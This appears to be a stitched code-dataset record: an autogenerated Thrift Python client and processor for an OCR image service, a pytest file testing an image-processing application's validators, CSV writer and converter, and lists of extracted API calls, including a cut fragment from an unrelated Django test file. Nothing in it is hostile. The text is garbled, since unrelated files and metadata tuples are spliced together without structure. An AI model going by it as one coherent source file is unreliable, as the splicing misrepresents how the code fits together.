reverse\n'), ((21994, 22027), 'django.urls.reverse', 'reverse', (['"""media"""'], {'args': '[11111111]'}), "('media', args=[11111111])\n", (22001, 22027), False, 'from django.urls import reverse\n'), ((824, 943), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne {licorne_id} de {user_id}"""', 'identifiant': 'f"""{user_id}-{licorne_id}"""', 'createur': 'u'}), "(nom=f'Licorne {licorne_id} de {user_id}',\n identifiant=f'{user_id}-{licorne_id}', createur=u)\n", (846, 943), False, 'from licornes.models import Licorne\n'), ((6305, 6353), 'os.path.join', 'os.path.join', (['"""licornes/tests"""', '"""image-test.jpg"""'], {}), "('licornes/tests', 'image-test.jpg')\n", (6317, 6353), False, 'import os\n'), ((6407, 6421), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (6414, 6421), False, 'from django.urls import reverse\n'), ((7598, 7640), 'os.path.join', 'os.path.join', (['"""licornes/tests"""', '"""spam.txt"""'], {}), "('licornes/tests', 'spam.txt')\n", (7610, 7640), False, 'import os\n'), ((7693, 7707), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (7700, 7707), False, 'from django.urls import reverse\n'), ((15536, 15687), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne {licorne_id} de {user_id}"""', 'identifiant': 'f"""{user_id}-{licorne_id}"""', 'createur': 'u', 'image': 'f"""{licorne_id}.png"""'}), "(nom=f'Licorne {licorne_id} de {user_id}',\n identifiant=f'{user_id}-{licorne_id}', createur=u, image=\n f'{licorne_id}.png')\n", (15558, 15687), False, 'from licornes.models import Licorne\n'), ((15826, 15854), 'licornes.models.Licorne.objects.latest', 'Licorne.objects.latest', (['"""id"""'], {}), "('id')\n", (15848, 15854), False, 'from licornes.models import Licorne\n'), ((20342, 20372), 'os.path.basename', 'os.path.basename', (["l.img['src']"], {}), "(l.img['src'])\n", (20358, 20372), False, 'import os\n'), ((20206, 20258), 're.sub', 
're.sub', (['"""Licorne ([0-9]+).*"""', '"""\\\\1"""', 'l.h2.text', 're.M'], {}), "('Licorne ([0-9]+).*', '\\\\1', l.h2.text, re.M)\n", (20212, 20258), False, 'import re\n')]
|
#
# Autogenerated by Thrift Compiler (0.11.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def version(self):
pass
def get_ocr(self, image):
"""
Parameters:
- image
"""
pass
def line_ocr(self, image):
"""
Parameters:
- image
"""
pass
def cut_image(self, image, cut_type):
"""
Parameters:
- image
- cut_type
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def version(self):
self.send_version()
return self.recv_version()
def send_version(self):
self._oprot.writeMessageBegin('version', TMessageType.CALL, self._seqid)
args = version_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_version(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = version_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "version failed: unknown result")
def get_ocr(self, image):
"""
Parameters:
- image
"""
self.send_get_ocr(image)
return self.recv_get_ocr()
def send_get_ocr(self, image):
self._oprot.writeMessageBegin('get_ocr', TMessageType.CALL, self._seqid)
args = get_ocr_args()
args.image = image
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_ocr(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_ocr_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_ocr failed: unknown result")
def line_ocr(self, image):
"""
Parameters:
- image
"""
self.send_line_ocr(image)
return self.recv_line_ocr()
def send_line_ocr(self, image):
self._oprot.writeMessageBegin('line_ocr', TMessageType.CALL, self._seqid)
args = line_ocr_args()
args.image = image
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_line_ocr(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = line_ocr_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "line_ocr failed: unknown result")
def cut_image(self, image, cut_type):
"""
Parameters:
- image
- cut_type
"""
self.send_cut_image(image, cut_type)
return self.recv_cut_image()
def send_cut_image(self, image, cut_type):
self._oprot.writeMessageBegin('cut_image', TMessageType.CALL, self._seqid)
args = cut_image_args()
args.image = image
args.cut_type = cut_type
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_cut_image(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = cut_image_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "cut_image failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["version"] = Processor.process_version
self._processMap["get_ocr"] = Processor.process_get_ocr
self._processMap["line_ocr"] = Processor.process_line_ocr
self._processMap["cut_image"] = Processor.process_cut_image
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_version(self, seqid, iprot, oprot):
args = version_args()
args.read(iprot)
iprot.readMessageEnd()
result = version_result()
try:
result.success = self._handler.version()
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("version", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_ocr(self, seqid, iprot, oprot):
args = get_ocr_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_ocr_result()
try:
result.success = self._handler.get_ocr(args.image)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_ocr", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_line_ocr(self, seqid, iprot, oprot):
args = line_ocr_args()
args.read(iprot)
iprot.readMessageEnd()
result = line_ocr_result()
try:
result.success = self._handler.line_ocr(args.image)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("line_ocr", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_cut_image(self, seqid, iprot, oprot):
args = cut_image_args()
args.read(iprot)
iprot.readMessageEnd()
result = cut_image_result()
try:
result.success = self._handler.cut_image(args.image, args.cut_type)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("cut_image", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class version_args(object):
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('version_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(version_args)
version_args.thrift_spec = (
)
class version_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('version_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success.encode('utf-8') if sys.version_info[0] == 2 else self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(version_result)
version_result.thrift_spec = (
(0, TType.STRING, 'success', 'UTF8', None, ), # 0
)
class get_ocr_args(object):
"""
Attributes:
- image
"""
def __init__(self, image=None,):
self.image = image
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.image = iprot.readBinary()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_ocr_args')
if self.image is not None:
oprot.writeFieldBegin('image', TType.STRING, 1)
oprot.writeBinary(self.image)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_ocr_args)
get_ocr_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'image', 'BINARY', None, ), # 1
)
class get_ocr_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_ocr_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success.encode('utf-8') if sys.version_info[0] == 2 else self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_ocr_result)
get_ocr_result.thrift_spec = (
(0, TType.STRING, 'success', 'UTF8', None, ), # 0
)
class line_ocr_args(object):
"""
Attributes:
- image
"""
def __init__(self, image=None,):
self.image = image
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.image = iprot.readBinary()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('line_ocr_args')
if self.image is not None:
oprot.writeFieldBegin('image', TType.STRING, 1)
oprot.writeBinary(self.image)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(line_ocr_args)
line_ocr_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'image', 'BINARY', None, ), # 1
)
class line_ocr_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('line_ocr_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success.encode('utf-8') if sys.version_info[0] == 2 else self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(line_ocr_result)
line_ocr_result.thrift_spec = (
(0, TType.STRING, 'success', 'UTF8', None, ), # 0
)
class cut_image_args(object):
"""
Attributes:
- image
- cut_type
"""
def __init__(self, image=None, cut_type=None,):
self.image = image
self.cut_type = cut_type
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.image = iprot.readBinary()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.BYTE:
self.cut_type = iprot.readByte()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('cut_image_args')
if self.image is not None:
oprot.writeFieldBegin('image', TType.STRING, 1)
oprot.writeBinary(self.image)
oprot.writeFieldEnd()
if self.cut_type is not None:
oprot.writeFieldBegin('cut_type', TType.BYTE, 2)
oprot.writeByte(self.cut_type)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(cut_image_args)
cut_image_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'image', 'BINARY', None, ), # 1
(2, TType.BYTE, 'cut_type', None, None, ), # 2
)
class cut_image_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = iprot.readBinary()
self.success.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('cut_image_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter6 in self.success:
oprot.writeBinary(iter6)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(cut_image_result)
cut_image_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING, 'BINARY', False), None, ), # 0
)
fix_spec(all_structs)
del all_structs
|
[
"logging.exception",
"thrift.Thrift.TApplicationException",
"thrift.TRecursive.fix_spec"
] |
[((25716, 25737), 'thrift.TRecursive.fix_spec', 'fix_spec', (['all_structs'], {}), '(all_structs)\n', (25724, 25737), False, 'from thrift.TRecursive import fix_spec\n'), ((1866, 1963), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.MISSING_RESULT', '"""version failed: unknown result"""'], {}), "(TApplicationException.MISSING_RESULT,\n 'version failed: unknown result')\n", (1887, 1963), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((2857, 2954), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.MISSING_RESULT', '"""get_ocr failed: unknown result"""'], {}), "(TApplicationException.MISSING_RESULT,\n 'get_ocr failed: unknown result')\n", (2878, 2954), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((3856, 3954), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.MISSING_RESULT', '"""line_ocr failed: unknown result"""'], {}), "(TApplicationException.MISSING_RESULT,\n 'line_ocr failed: unknown result')\n", (3877, 3954), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((4947, 5046), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.MISSING_RESULT', '"""cut_image failed: unknown result"""'], {}), "(TApplicationException.MISSING_RESULT,\n 'cut_image failed: unknown result')\n", (4968, 5046), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((1582, 1605), 'thrift.Thrift.TApplicationException', 'TApplicationException', ([], {}), '()\n', (1603, 1605), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((2573, 2596), 'thrift.Thrift.TApplicationException', 'TApplicationException', ([], {}), '()\n', (2594, 2596), False, 'from 
thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((3571, 3594), 'thrift.Thrift.TApplicationException', 'TApplicationException', ([], {}), '()\n', (3592, 3594), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((4661, 4684), 'thrift.Thrift.TApplicationException', 'TApplicationException', ([], {}), '()\n', (4682, 4684), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((5660, 5754), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.UNKNOWN_METHOD', "('Unknown function %s' % name)"], {}), "(TApplicationException.UNKNOWN_METHOD, \n 'Unknown function %s' % name)\n", (5681, 5754), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((6437, 6491), 'logging.exception', 'logging.exception', (['"""TApplication exception in handler"""'], {}), "('TApplication exception in handler')\n", (6454, 6491), False, 'import logging\n'), ((6600, 6652), 'logging.exception', 'logging.exception', (['"""Unexpected exception in handler"""'], {}), "('Unexpected exception in handler')\n", (6617, 6652), False, 'import logging\n'), ((6720, 6797), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.INTERNAL_ERROR', '"""Internal error"""'], {}), "(TApplicationException.INTERNAL_ERROR, 'Internal error')\n", (6741, 6797), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((7358, 7412), 'logging.exception', 'logging.exception', (['"""TApplication exception in handler"""'], {}), "('TApplication exception in handler')\n", (7375, 7412), False, 'import logging\n'), ((7521, 7573), 'logging.exception', 'logging.exception', (['"""Unexpected exception in handler"""'], {}), "('Unexpected exception in handler')\n", (7538, 7573), False, 'import logging\n'), ((7641, 
7718), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.INTERNAL_ERROR', '"""Internal error"""'], {}), "(TApplicationException.INTERNAL_ERROR, 'Internal error')\n", (7662, 7718), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((8283, 8337), 'logging.exception', 'logging.exception', (['"""TApplication exception in handler"""'], {}), "('TApplication exception in handler')\n", (8300, 8337), False, 'import logging\n'), ((8446, 8498), 'logging.exception', 'logging.exception', (['"""Unexpected exception in handler"""'], {}), "('Unexpected exception in handler')\n", (8463, 8498), False, 'import logging\n'), ((8566, 8643), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.INTERNAL_ERROR', '"""Internal error"""'], {}), "(TApplicationException.INTERNAL_ERROR, 'Internal error')\n", (8587, 8643), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((9228, 9282), 'logging.exception', 'logging.exception', (['"""TApplication exception in handler"""'], {}), "('TApplication exception in handler')\n", (9245, 9282), False, 'import logging\n'), ((9391, 9443), 'logging.exception', 'logging.exception', (['"""Unexpected exception in handler"""'], {}), "('Unexpected exception in handler')\n", (9408, 9443), False, 'import logging\n'), ((9511, 9588), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.INTERNAL_ERROR', '"""Internal error"""'], {}), "(TApplicationException.INTERNAL_ERROR, 'Internal error')\n", (9532, 9588), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n')]
|
import csv
import os
import cv2
import pytest
import numpy as np
from Converter import Converter
from Main import Application
from Processing import Processing
from Utilities import Writer
from Processing.GaussianNoise import GaussianNoise
class TestValidationCount(object):
def test_empty(self):
assert not Application().on_validate_count(P="")
def test_p_zero(self):
assert Application().on_validate_count(P="0")
def test_p_less(self):
assert Application().on_validate_count(P="2000")
def test_p_more(self):
assert not Application().on_validate_count(P="200000")
def test_value_error(self):
assert not Application().on_validate_count(P="asjkdhaksdh")
def test_negative(self):
assert not Application().on_validate_count(P="-1000")
class TestValidationRes(object):
def test_validation_res_p_empty(self):
assert not Application().on_validate_res(P="")
def test_validation_res_p_zero(self):
assert Application().on_validate_count(P="0")
def test_validation_res_p_less(self):
assert Application().on_validate_count(P="1900")
def test_validation_res_p_more(self):
assert not Application().on_validate_count(P="200000")
def test_validation_res_value_error(self):
assert not Application().on_validate_count(P="asjkdhaksdh")
def test_negative(self):
assert not Application().on_validate_count(P="-1000")
class TestWriter(object):
def test_correct_name(self):
file_name = "../images/buffer/training.csv"
Writer(file_name)
assert os.path.isfile(file_name)
os.remove(file_name)
def test_incorrect_name(self):
with pytest.raises(OSError):
Writer("&?akjhdsfksdf.csv")
def test_insert_row(self):
file_name = "../images/buffer/training.csv"
writer = Writer(file_name)
assert os.path.isfile(file_name)
writer.write_row_to_file("123")
writer.file.close()
file = open(file_name, "r")
reader = csv.reader(file)
for row in reader:
assert row == ['1', '2', '3']
file.close()
os.remove(file_name)
class TestConverter(object):
def test_bar(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Bar"
)
assert result[0] == '1'
def test_circle(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Circle"
)
assert result[0] == '2'
def test_dots(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Dots"
)
assert result[0] == '3'
def test_ellipse(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Ellipse"
)
assert result[0] == '4'
def test_popcorn(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Popcorn"
)
assert result[0] == '5'
def test_something(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Something"
)
assert result[0] == '0'
def test_gaussian_noise():
image = cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE)
assert not np.array_equal(GaussianNoise.process(image), image)
def test_processing():
image = cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE)
assert not np.array_equal(
Processing.process_image('../images/buffer/new.png'),
image
)
|
[
"os.remove",
"Processing.Processing.process_image",
"csv.reader",
"Main.Application",
"Utilities.Writer",
"cv2.imread",
"os.path.isfile",
"pytest.raises",
"Processing.GaussianNoise.GaussianNoise.process"
] |
